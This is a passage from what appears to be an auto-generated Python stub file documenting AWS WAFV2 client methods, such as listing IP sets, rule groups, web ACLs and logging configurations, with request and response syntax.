'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
}
}
:returns:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
"""
pass
def list_available_managed_rule_groups(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of managed rule groups that are available for you to use. This list includes all AWS Managed Rules rule groups and the AWS Marketplace managed rule groups that you\'re subscribed to.
See also: AWS API Documentation
Exceptions
:example: response = client.list_available_managed_rule_groups(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'ManagedRuleGroups': [
{
'VendorName': 'string',
'Name': 'string',
'Description': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
ManagedRuleGroups (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a managed rule group, returned by ListAvailableManagedRuleGroups . This provides information like the name and vendor name, that you provide when you add a ManagedRuleGroupStatement to a web ACL. Managed rule groups include AWS Managed Rules rule groups, which are free of charge to AWS WAF customers, and AWS Marketplace managed rule groups, which you can subscribe to through AWS Marketplace.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
Description (string) --
The description of the managed rule group, provided by AWS Managed Rules or the AWS Marketplace seller who manages it.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'ManagedRuleGroups': [
{
'VendorName': 'string',
'Name': 'string',
'Description': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_ip_sets(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of IPSetSummary objects for the IP sets that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_ip_sets(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'IPSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
IPSets (list) --
Array of IPSets. This may not be the full list of IPSets that you have defined. See the Limit specification for this request.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about an IPSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage an IPSet , and the ARN, that you provide to the IPSetReferenceStatement to use the address set in a Rule .
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'IPSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_logging_configurations(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of your LoggingConfiguration objects.
See also: AWS API Documentation
Exceptions
:example: response = client.list_logging_configurations(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: Specifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'LoggingConfigurations': [
{
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
},
],
'NextMarker': 'string'
}
Response Structure
(dict) --
LoggingConfigurations (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines an association between Amazon Kinesis Data Firehose destinations and a web ACL resource, for logging from AWS WAF. As part of the association, you can specify parts of the standard logging fields to keep out of the logs.
ResourceArn (string) --
The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --
The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --
The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfigurations': [
{
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
},
],
'NextMarker': 'string'
}
:returns:
(string) --
"""
pass
def list_regex_pattern_sets(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of RegexPatternSetSummary objects for the regex pattern sets that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_regex_pattern_sets(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'RegexPatternSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
RegexPatternSets (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a RegexPatternSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RegexPatternSet , and the ARN, that you provide to the RegexPatternSetReferenceStatement to use the pattern set in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'RegexPatternSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_resources_for_web_acl(WebACLArn=None, ResourceType=None):
"""
Retrieves an array of the Amazon Resource Names (ARNs) for the regional resources that are associated with the specified web ACL. If you want the list of AWS CloudFront resources, use the AWS CloudFront call ListDistributionsByWebACLId .
See also: AWS API Documentation
Exceptions
:example: response = client.list_resources_for_web_acl(
WebACLArn='string',
ResourceType='APPLICATION_LOAD_BALANCER'|'API_GATEWAY'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the Web ACL.\n
:type ResourceType: string
:param ResourceType: Used for web ACLs that are scoped for regional applications. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
:rtype: dict
ReturnsResponse Syntax
{
'ResourceArns': [
'string',
]
}
Response Structure
(dict) --
ResourceArns (list) --
The array of Amazon Resource Names (ARNs) of the associated resources.
(string) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'ResourceArns': [
'string',
]
}
:returns:
(string) --
"""
pass
def list_rule_groups(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of RuleGroupSummary objects for the rule groups that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_rule_groups(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'RuleGroups': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
RuleGroups (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a RuleGroup , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RuleGroup , and the ARN, that you provide to the RuleGroupReferenceStatement to use the rule group in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'RuleGroups': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_tags_for_resource(NextMarker=None, Limit=None, ResourceARN=None):
"""
Retrieves the TagInfoForResource for the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
NextMarker='string',
Limit=123,
ResourceARN='string'
)
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'TagInfoForResource': {
'ResourceARN': 'string',
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
TagInfoForResource (dict) --
The collection of tagging definitions for the resource.
ResourceARN (string) --
The Amazon Resource Name (ARN) of the resource.
TagList (list) --
The array of Tag objects defined for the resource.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as "environment") and the tag value represents a specific value within that category (such as "test," "development," or "production"). You can add up to 50 tags to each AWS resource.
Key (string) --
Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as "customer." Tag keys are case-sensitive.
Value (string) --
Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as "companyA" or "companyB." Tag values are case-sensitive.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'TagInfoForResource': {
'ResourceARN': 'string',
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_web_acls(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of WebACLSummary objects for the web ACLs that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_web_acls(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'WebACLs': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
WebACLs (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a WebACL , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a WebACL , and the ARN, that you provide to operations like AssociateWebACL .
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
The unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'WebACLs': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def put_logging_configuration(LoggingConfiguration=None):
"""
Enables the specified LoggingConfiguration , to start logging from a web ACL, according to the configuration provided.
You can access information about all traffic that AWS WAF inspects using the following steps:
When you successfully enable logging using a PutLoggingConfiguration request, AWS WAF will create a service linked role with the necessary permissions to write logs to the Amazon Kinesis Data Firehose. For more information, see Logging Web ACL Traffic Information in the AWS WAF Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.put_logging_configuration(
LoggingConfiguration={
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
]
}
)
:type LoggingConfiguration: dict
